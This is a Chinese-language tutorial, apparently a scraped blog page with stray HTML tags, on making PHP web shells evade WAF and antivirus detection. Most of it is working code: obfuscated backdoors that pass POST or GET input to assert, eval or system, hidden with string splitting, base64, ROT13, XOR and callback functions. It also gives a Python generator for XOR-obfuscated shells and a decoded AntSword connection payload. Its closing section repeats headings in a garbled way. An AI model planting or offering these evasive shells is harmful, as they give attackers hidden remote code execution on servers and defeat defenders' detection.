PHP木马混淆免杀技术详解<\/h1>

前言<\/h2>
在渗透测试或CTF竞赛中，面对Web应用防火墙(WAF)的防护，普通的一句话木马(Web Shell)通常会被检测出来。WAF的作用是监测并阻止恶意的HTTP请求和输入，因此要成功渗透并避免被检测，PHP木马免杀技术是非常重要的一项技能。<\/p>

静态免杀技术<\/h2>
静态免杀主要通过修改代码，使得其中的关键字或可疑函数变得不可识别。以下是一些常见的静态免杀方法：<\/p>

1. 关键字隐藏技术<\/h3>

拆解合并法<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>$ch =<\/span> explode<\/span>("."<\/span>, "hello.ass.world.er.t"<\/span>); 
<\/span><\/span>$c =<\/span> $ch[1<\/span>] .<\/span> $ch[3<\/span>] .<\/span> $ch[4<\/span>]; \/\/assert 
<\/span><\/span><\/span><\/span>$c($_POST['x'<\/span>]); 
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>二维数组隐藏<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>$f =<\/span> substr_replace<\/span>("systxx"<\/span>, "em"<\/span>, 4<\/span>); 
<\/span><\/span>$z =<\/span> array<\/span>($arrayName =<\/span> ($arrayName =<\/span> ($arrayName =<\/span> array<\/span>('a'<\/span> =><\/span> $f('whoami'<\/span>)))));
<\/span><\/span>var_dump<\/span>($z);
<\/span><\/span><\/code><\/pre>2. 编码技术<\/h3>
ROT13编码<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>$c =<\/span> str_rot13<\/span>('n!ff!re!nffreg'<\/span>); 
<\/span><\/span>echo<\/span> $c .<\/span> "<\/span>\n<\/span>"<\/span>; \/\/a!ss!er!assert 
<\/span><\/span><\/span><\/span>$str =<\/span> explode<\/span>('!'<\/span>, $c)[3<\/span>]; 
<\/span><\/span>echo<\/span> $str; \/\/asert
<\/span><\/span><\/span><\/code><\/pre>Base64编码<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>$f =<\/span> base64_decode<\/span>("YX____Nz__ZX__J0"<\/span>); \/\/解密后为assert高危函数 
<\/span><\/span><\/span><\/span>$f($_POST[aabyss<\/span>]); \/\/assert($_POST[aabyss]); 
<\/span><\/span><\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>ASCII编码<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>\/\/ASCII编码解密后为assert高危函数 
<\/span><\/span><\/span><\/span>$f =<\/span> chr<\/span>(98<\/span>-<\/span>1<\/span>).<\/span>chr<\/span>(116<\/span>-<\/span>1<\/span>).<\/span>chr<\/span>(116<\/span>-<\/span>1<\/span>).<\/span>chr<\/span>(103<\/span>-<\/span>2<\/span>).<\/span>chr<\/span>(112<\/span>+<\/span>2<\/span>).<\/span>chr<\/span>(110<\/span>+<\/span>6<\/span>); 
<\/span><\/span>$f($_POST['aabyss'<\/span>]); \/\/assert($_POST['aabyss']); 
<\/span><\/span><\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>3. 函数拼接技术<\/h3>
array_map实例<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>$letters =<\/span> array<\/span>('a'<\/span>,'s'<\/span>,'s'<\/span>,'e'<\/span>,'r'<\/span>,'t'<\/span>); 
<\/span><\/span>$c =<\/span> implode<\/span>(array_map<\/span>('strtolower'<\/span>, $letters)); \/\/ 使用array_map拼接assert 
<\/span><\/span><\/span><\/span>$c($_POST['x'<\/span>]); 
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>str_replace实例<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>$str =<\/span> 'a'<\/span>; 
<\/span><\/span>$str =<\/span> str_replace<\/span>('a'<\/span>, 'a'<\/span>, $str); 
<\/span><\/span>$str .=<\/span> 's'<\/span>; 
<\/span><\/span>$str .=<\/span> 's'<\/span>; 
<\/span><\/span>$str .=<\/span> 'e'<\/span>; 
<\/span><\/span>$str .=<\/span> 'r'<\/span>; 
<\/span><\/span>$str .=<\/span> 't'<\/span>; 
<\/span><\/span>$str($_POST['x'<\/span>]);
<\/span><\/span><\/code><\/pre>4. 异或绕过技术<\/h3>
<?<\/span>php<\/span> 
<\/span><\/span>$_StL =<\/span> "Y"<\/span> ^<\/span> "<\/span>\x38<\/span>"<\/span>; 
<\/span><\/span>$_ENr =<\/span> "T"<\/span> ^<\/span> "<\/span>\x27<\/span>"<\/span>; 
<\/span><\/span>$_ohw =<\/span> "^"<\/span> ^<\/span> "<\/span>\x2d<\/span>"<\/span>; 
<\/span><\/span>$_gpN =<\/span> "~"<\/span> ^<\/span> "<\/span>\x1b<\/span>"<\/span>; 
<\/span><\/span>$_fyR =<\/span> "g"<\/span> ^<\/span> "<\/span>\x15<\/span>"<\/span>; 
<\/span><\/span>$_pAs =<\/span> "H"<\/span> ^<\/span> "<\/span>\x3c<\/span>"<\/span>; 
<\/span><\/span>$c =<\/span> $_StL.<\/span>$_ENr.<\/span>$_ohw.<\/span>$_gpN.<\/span>$_fyR.<\/span>$_pAs;
<\/span><\/span><\/code><\/pre>Python生成异或绕过免杀马脚本：<\/p>
import<\/span> random
<\/span><\/span>
<\/span><\/span>def<\/span> random_keys<\/span>(len):
<\/span><\/span>    str =<\/span> '`abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'<\/span>
<\/span><\/span>    return<\/span> ''<\/span>.<\/span>join(random.<\/span>sample(str, len))
<\/span><\/span>
<\/span><\/span>def<\/span> random_var<\/span>(len):
<\/span><\/span>    str =<\/span> 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'<\/span>
<\/span><\/span>    return<\/span> ''<\/span>.<\/span>join(random.<\/span>sample(str, len))
<\/span><\/span>
<\/span><\/span>def<\/span> xor<\/span>(c1, c2):
<\/span><\/span>    return<\/span> hex(ord(c1) ^<\/span> ord(c2)).<\/span>replace('0x'<\/span>, r<\/span>"\x"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> generate<\/span>(target):
<\/span><\/span>    key =<\/span> random_keys(len(target))
<\/span><\/span>    func_line =<\/span> ''<\/span>
<\/span><\/span>    call =<\/span> '$target='<\/span>
<\/span><\/span>    for<\/span> i in<\/span> range(0<\/span>, len(target)):
<\/span><\/span>        enc =<\/span> xor(target[i], key[i])
<\/span><\/span>        var =<\/span> random_var(3<\/span>)
<\/span><\/span>        func_line +=<\/span> f<\/span>'$_<\/span>{<\/span>var}<\/span>="<\/span>{<\/span>key[i]}<\/span>"^"<\/span>{<\/span>enc}<\/span>";'<\/span>
<\/span><\/span>        func_line +=<\/span> '<\/span>\n<\/span>'<\/span>
<\/span><\/span>        call +=<\/span> '$_<\/span>%s<\/span>.'<\/span> %<\/span> var
<\/span><\/span>    call =<\/span> call.<\/span>rstrip('.'<\/span>) +<\/span> ';'<\/span>
<\/span><\/span>    print(func_line)
<\/span><\/span>    print(call)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> '__main__'<\/span>:
<\/span><\/span>    target =<\/span> input('input target to generate: <\/span>\r\n<\/span>'<\/span>)
<\/span><\/span>    generate(target)
<\/span><\/span><\/code><\/pre>5. 类与函数分散技术<\/h3>
多函数分散<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>function<\/span> getPart<\/span>($str, $i) { return<\/span> substr<\/span>($str, $i, 1<\/span>); } 
<\/span><\/span>function<\/span> combineParts<\/span>() { 
<\/span><\/span>    return<\/span> getPart<\/span>('a'<\/span>,0<\/span>).<\/span>getPart<\/span>('s'<\/span>,0<\/span>).<\/span>getPart<\/span>('s'<\/span>,0<\/span>).<\/span>getPart<\/span>('e'<\/span>,0<\/span>).<\/span>getPart<\/span>('r'<\/span>,0<\/span>).<\/span>getPart<\/span>('t'<\/span>,0<\/span>); 
<\/span><\/span>} 
<\/span><\/span>$c =<\/span> combineParts<\/span>(); 
<\/span><\/span>@<\/span>$c($_POST['x'<\/span>]); 
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>类方法隐藏<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>class<\/span> Test<\/span> { 
<\/span><\/span>    public<\/span> $config =<\/span> ''<\/span>; 
<\/span><\/span>    function<\/span> __destruct() { 
<\/span><\/span>        $ch =<\/span> explode<\/span>("."<\/span>, "hello.ass.world.er.rt.e.saucerman"<\/span>); 
<\/span><\/span>        $c =<\/span> $ch[1<\/span>].<\/span>$ch[5<\/span>].<\/span>$ch[4<\/span>]; 
<\/span><\/span>        @<\/span>$c($this-><\/span>config<\/span>); 
<\/span><\/span>    } 
<\/span><\/span>} 
<\/span><\/span>$test =<\/span> new<\/span> Test<\/span>(); 
<\/span><\/span>@<\/span>$test-><\/span>config<\/span> =<\/span> $_POST['x'<\/span>];
<\/span><\/span><\/code><\/pre>6. 冷门回调函数技术<\/h3>
array_uintersect_uassoc示例<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>function<\/span> myfunction_key<\/span>($a, $b){ 
<\/span><\/span>    if<\/span>($a===<\/span>$b){ return<\/span> 0<\/span>; } 
<\/span><\/span>    return<\/span> ($a><\/span>$b)?<\/span>1<\/span>:-<\/span>1<\/span>; 
<\/span><\/span>} 
<\/span><\/span>
<\/span><\/span>class<\/span> rtHjmCdS<\/span> { 
<\/span><\/span>    public<\/span> $fHfoj; 
<\/span><\/span>    public<\/span> $fDaGv; 
<\/span><\/span>    public<\/span> $HgAjSd; 
<\/span><\/span>    
<\/span><\/span>    function<\/span> __construct(){ 
<\/span><\/span>        $_xlr =<\/span> "J"<\/span> ^<\/span> "<\/span>\x2b<\/span>"<\/span>; 
<\/span><\/span>        $_Nbv =<\/span> "V"<\/span> ^<\/span> "<\/span>\x25<\/span>"<\/span>; 
<\/span><\/span>        $_cfh =<\/span> "T"<\/span> ^<\/span> "<\/span>\x27<\/span>"<\/span>; 
<\/span><\/span>        $_PdK =<\/span> "I"<\/span> ^<\/span> "<\/span>\x2c<\/span>"<\/span>; 
<\/span><\/span>        $_zJQ =<\/span> "+"<\/span> ^<\/span> "<\/span>\x59<\/span>"<\/span>; 
<\/span><\/span>        $_RgD =<\/span> "="<\/span> ^<\/span> "<\/span>\x49<\/span>"<\/span>; 
<\/span><\/span>        $this-><\/span>fDaGv<\/span> =<\/span> $_xlr.<\/span>$_Nbv.<\/span>$_cfh.<\/span>$_PdK.<\/span>$_zJQ.<\/span>$_RgD; 
<\/span><\/span>        
<\/span><\/span>        $_fLd =<\/span> "a"<\/span> ^<\/span> "<\/span>\x0<\/span>"<\/span>; 
<\/span><\/span>        $_wOK =<\/span> "j"<\/span> ^<\/span> "<\/span>\x18<\/span>"<\/span>; 
<\/span><\/span>        $_tAH =<\/span> "U"<\/span> ^<\/span> "<\/span>\x27<\/span>"<\/span>; 
<\/span><\/span>        $_HeV =<\/span> "J"<\/span> ^<\/span> "<\/span>\x2b<\/span>"<\/span>; 
<\/span><\/span>        $_cyo =<\/span> "-"<\/span> ^<\/span> "<\/span>\x54<\/span>"<\/span>; 
<\/span><\/span>        $_iSW =<\/span> "F"<\/span> ^<\/span> "<\/span>\x19<\/span>"<\/span>; 
<\/span><\/span>        $_jYS =<\/span> "\/"<\/span> ^<\/span> "<\/span>\x5a<\/span>"<\/span>; 
<\/span><\/span>        $_BFt =<\/span> "h"<\/span> ^<\/span> "<\/span>\x1<\/span>"<\/span>; 
<\/span><\/span>        $_TRn =<\/span> "p"<\/span> ^<\/span> "<\/span>\x1e<\/span>"<\/span>; 
<\/span><\/span>        $_izx =<\/span> "k"<\/span> ^<\/span> "<\/span>\x1f<\/span>"<\/span>; 
<\/span><\/span>        $_gMz =<\/span> "X"<\/span> ^<\/span> "<\/span>\x3d<\/span>"<\/span>; 
<\/span><\/span>        $_TNu =<\/span> "<"<\/span> ^<\/span> "<\/span>\x4e<\/span>"<\/span>; 
<\/span><\/span>        $_UiE =<\/span> "v"<\/span> ^<\/span> "<\/span>\x5<\/span>"<\/span>; 
<\/span><\/span>        $_iHI =<\/span> "q"<\/span> ^<\/span> "<\/span>\x14<\/span>"<\/span>; 
<\/span><\/span>        $_LIK =<\/span> "m"<\/span> ^<\/span> "<\/span>\xe<\/span>"<\/span>; 
<\/span><\/span>        $_Yey =<\/span> "Z"<\/span> ^<\/span> "<\/span>\x2e<\/span>"<\/span>; 
<\/span><\/span>        $_lMr =<\/span> "="<\/span> ^<\/span> "<\/span>\x62<\/span>"<\/span>; 
<\/span><\/span>        $_WOI =<\/span> "+"<\/span> ^<\/span> "<\/span>\x5e<\/span>"<\/span>; 
<\/span><\/span>        $_FQy =<\/span> "u"<\/span> ^<\/span> "<\/span>\x14<\/span>"<\/span>; 
<\/span><\/span>        $_sjC =<\/span> "d"<\/span> ^<\/span> "<\/span>\x17<\/span>"<\/span>; 
<\/span><\/span>        $_mOr =<\/span> ">"<\/span> ^<\/span> "<\/span>\x4d<\/span>"<\/span>; 
<\/span><\/span>        $_Txf =<\/span> "*"<\/span> ^<\/span> "<\/span>\x45<\/span>"<\/span>; 
<\/span><\/span>        $_PmW =<\/span> "O"<\/span> ^<\/span> "<\/span>\x2c<\/span>"<\/span>; 
<\/span><\/span>        $this-><\/span>HgAjSd<\/span> =<\/span> $_fLd.<\/span>$_wOK.<\/span>$_tAH.<\/span>$_HeV.<\/span>$_cyo.<\/span>$_iSW.<\/span>$_jYS.<\/span>$_BFt.<\/span>$_TRn.<\/span>$_izx.<\/span>$_gMz.<\/span>$_TNu.<\/span>$_UiE.<\/span>$_iHI.<\/span>$_LIK.<\/span>$_Yey.<\/span>$_lMr.<\/span>$_WOI.<\/span>$_FQy.<\/span>$_sjC.<\/span>$_mOr.<\/span>$_Txf.<\/span>$_PmW; 
<\/span><\/span>    } 
<\/span><\/span>    
<\/span><\/span>    function<\/span> __destruct(){ 
<\/span><\/span>        $Hfdag =<\/span> $this-><\/span>HgAjSd<\/span>; \/\/'array_uintersect_uassoc' 
<\/span><\/span><\/span><\/span>        $fdJfd =<\/span> $this-><\/span>fDaGv<\/span>; \/\/ 'assert' 
<\/span><\/span><\/span><\/span>        @<\/span>$Hfdag(array<\/span>($this-><\/span>fHfoj<\/span>),array<\/span>(''<\/span>),$fdJfd,'myfunction_key'<\/span>); 
<\/span><\/span>    } 
<\/span><\/span>} 
<\/span><\/span>
<\/span><\/span>$jfnp =<\/span> new<\/span> rtHjmCdS<\/span>(); 
<\/span><\/span>@<\/span>$jfnp-><\/span>fHfoj<\/span> =<\/span> $_REQUEST['css'<\/span>]; 
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>其他常见回调函数：<\/p>

call_user_func_array()<\/li>
call_user_func()<\/li>
array_filter()<\/li>
array_walk()<\/li>
array_map()<\/li>
register_shutdown_function()<\/li>
register_tick_function()<\/li>
filter_var()<\/li>
filter_var_array()<\/li>
uasort()<\/li>
uksort()<\/li>
array_reduce()<\/li>
array_walk()<\/li>
array_walk_recursive()<\/li>
<\/ul>
7. 字符串读取技术<\/h3>
读取注释<\/h4>
<?<\/span>php<\/span> 
<\/span><\/span>\/** 
<\/span><\/span><\/span> * system('whoami'); 
<\/span><\/span><\/span> * *\/<\/span> 
<\/span><\/span>class<\/span> User<\/span> {} 
<\/span><\/span>$user =<\/span> new<\/span> ReflectionClass<\/span>('User'<\/span>); 
<\/span><\/span>$comment =<\/span> $user-><\/span>getDocComment<\/span>(); 
<\/span><\/span>echo<\/span> $comment; 
<\/span><\/span>echo<\/span> "<\/span>\n<\/span>"<\/span>; 
<\/span><\/span>$f =<\/span> substr<\/span>($comment, 8<\/span>, 17<\/span>); 
<\/span><\/span>echo<\/span> $f; 
<\/span><\/span>eval<\/span>($f);
<\/span><\/span><\/code><\/pre>读取数据库<\/h4>
<?<\/span>php<\/span>
<\/span><\/span>\/\/ 写入数据库文件
<\/span><\/span><\/span><\/span>$datatest =<\/span> "[文件的base64编码]"<\/span>;
<\/span><\/span>file_put_contents<\/span>('.\/要写入的文件名'<\/span>, base64_decode<\/span>($datatest));
<\/span><\/span>
<\/span><\/span>\/\/ 读取数据库内容
<\/span><\/span><\/span><\/span>$path =<\/span> "数据库文件名"<\/span>;
<\/span><\/span>$db =<\/span> new<\/span> PDO<\/span>("sqlite:"<\/span> .<\/span> $path);
<\/span><\/span>$sql_stmt =<\/span> $db-><\/span>prepare<\/span>('select * from test where name="system"'<\/span>);
<\/span><\/span>$sql_stmt-><\/span>execute<\/span>();
<\/span><\/span>$f =<\/span> substr<\/span>($sql_stmt-><\/span>queryString<\/span>, -<\/span>7<\/span>, 6<\/span>);
<\/span><\/span>$f($_GET['b'<\/span>]);
<\/span><\/span><\/code><\/pre>动态免杀技术<\/h2>
要绕过流量监测，尤其是WAF的检测，我们可以通过对木马的动态行为、函数和关键字进行混淆和编码。<\/p>
蚁剑连接示例<\/h3>
原始木马：<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>class<\/span> Test<\/span> { 
<\/span><\/span>    public<\/span> $name =<\/span> ''<\/span>; 
<\/span><\/span>    function<\/span> __destruct(){ 
<\/span><\/span>        @<\/span>eval<\/span>("<\/span>$this->name<\/span>"<\/span>); 
<\/span><\/span>    } 
<\/span><\/span>} 
<\/span><\/span>$test =<\/span> new<\/span> Test<\/span>(); 
<\/span><\/span>$c =<\/span> @<\/span>$_POST['css'<\/span>]; 
<\/span><\/span>$test-><\/span>name<\/span> =<\/span> $c;
<\/span><\/span><\/code><\/pre>蚁剑连接时的POST数据（解码后）：<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>@<\/span>ini_set<\/span>("display_errors"<\/span>, "0"<\/span>); 
<\/span><\/span>@<\/span>set_time_limit<\/span>(0<\/span>); 
<\/span><\/span>
<\/span><\/span>function<\/span> asenc<\/span>($out) { return<\/span> $out; } 
<\/span><\/span>
<\/span><\/span>function<\/span> asoutput<\/span>() { 
<\/span><\/span>    $output =<\/span> ob_get_contents<\/span>(); 
<\/span><\/span>    ob_end_clean<\/span>(); 
<\/span><\/span>    echo<\/span> "ae2ea"<\/span>; 
<\/span><\/span>    echo<\/span> @<\/span>asenc<\/span>($output); 
<\/span><\/span>    echo<\/span> "348cb"<\/span>; 
<\/span><\/span>} 
<\/span><\/span>
<\/span><\/span>ob_start<\/span>(); 
<\/span><\/span>try<\/span> { 
<\/span><\/span>    $D =<\/span> dirname<\/span>($_SERVER["SCRIPT_FILENAME"<\/span>]); 
<\/span><\/span>    if<\/span>($D ==<\/span> ""<\/span>) { 
<\/span><\/span>        $D =<\/span> dirname<\/span>($_SERVER["PATH_TRANSLATED"<\/span>]); 
<\/span><\/span>    } 
<\/span><\/span>    $R =<\/span> "<\/span>{<\/span>$D}<\/span>\t<\/span>"<\/span>; 
<\/span><\/span>    if<\/span>(substr<\/span>($D,0<\/span>,1<\/span>) !=<\/span> "\/"<\/span>) { 
<\/span><\/span>        foreach<\/span>(range<\/span>("C"<\/span>,"Z"<\/span>) as<\/span> $L) { 
<\/span><\/span>            if<\/span>(is_dir<\/span>("<\/span>{<\/span>$L}<\/span>:"<\/span>)) { 
<\/span><\/span>                $R .=<\/span> "<\/span>{<\/span>$L}<\/span>:"<\/span>; 
<\/span><\/span>            } 
<\/span><\/span>        } 
<\/span><\/span>    } else<\/span> { 
<\/span><\/span>        $R .=<\/span> "\/"<\/span>; 
<\/span><\/span>    } 
<\/span><\/span>    $R .=<\/span> "<\/span>\t<\/span>"<\/span>; 
<\/span><\/span>    $u =<\/span> function_exists<\/span>("posix_getegid"<\/span>) ?<\/span> @<\/span>posix_getpwuid<\/span>(@<\/span>posix_geteuid<\/span>()) :<\/span> ""<\/span>; 
<\/span><\/span>    $s =<\/span> $u ?<\/span> $u["name"<\/span>] :<\/span> @<\/span>get_current_user<\/span>(); 
<\/span><\/span>    $R .=<\/span> php_uname<\/span>(); 
<\/span><\/span>    $R .=<\/span> "<\/span>\t<\/span>{<\/span>$s}<\/span>"<\/span>; 
<\/span><\/span>    echo<\/span> $R; 
<\/span><\/span>} catch<\/span>(Exception<\/span> $e) { 
<\/span><\/span>    echo<\/span> "ERROR:\/\/"<\/span>.<\/span>$e-><\/span>getMessage<\/span>(); 
<\/span><\/span>} 
<\/span><\/span>asoutput<\/span>(); 
<\/span><\/span>die<\/span>();
<\/span><\/span><\/code><\/pre>总结<\/h2>
PHP木马免杀技术主要包括：<\/p>


静态免杀<\/strong>：<\/p>

关键字拆分与拼接<\/li>
各种编码技术（Base64、ROT13、ASCII等）<\/li>
异或运算绕过<\/li>
使用冷门回调函数<\/li>
类与函数分散技术<\/li>
字符串读取技术<\/li>
<\/ul>
<\/li>

动态免杀<\/strong>：<\/p>

流量混淆<\/li>
动态行为伪装<\/li>
蚁剑等工具的特殊编码方式<\/li>
<\/ul>
<\/li>
<\/ol>
这些技术可以单独使用，也可以组合使用以达到更好的免杀效果。在实际应用中，需要根据目标环境的特点选择合适的免杀方法。<\/p>
PHP木马混淆免杀技术详解<\/h1>

静态免杀技术<\/h2> 静态免杀主要通过修改代码，使得其中的关键字或可疑函数变得不可识别。以下是一些常见的静态免杀方法：<\/p>

1. 关键字隐藏技术<\/h3>

2. 编码技术<\/h3>

3. 函数拼接技术<\/h3>

5. 类与函数分散技术<\/h3>

6. 冷门回调函数技术<\/h3>

7. 字符串读取技术<\/h3>

动态免杀技术<\/h2> 要绕过流量监测，尤其是WAF的检测，我们可以通过对木马的动态行为、函数和关键字进行混淆和编码。<\/p>

静态免杀技术<\/h2>
静态免杀主要通过修改代码，使得其中的关键字或可疑函数变得不可识别。以下是一些常见的静态免杀方法：<\/p>

动态免杀技术<\/h2>
要绕过流量监测，尤其是WAF的检测，我们可以通过对木马的动态行为、函数和关键字进行混淆和编码。<\/p>
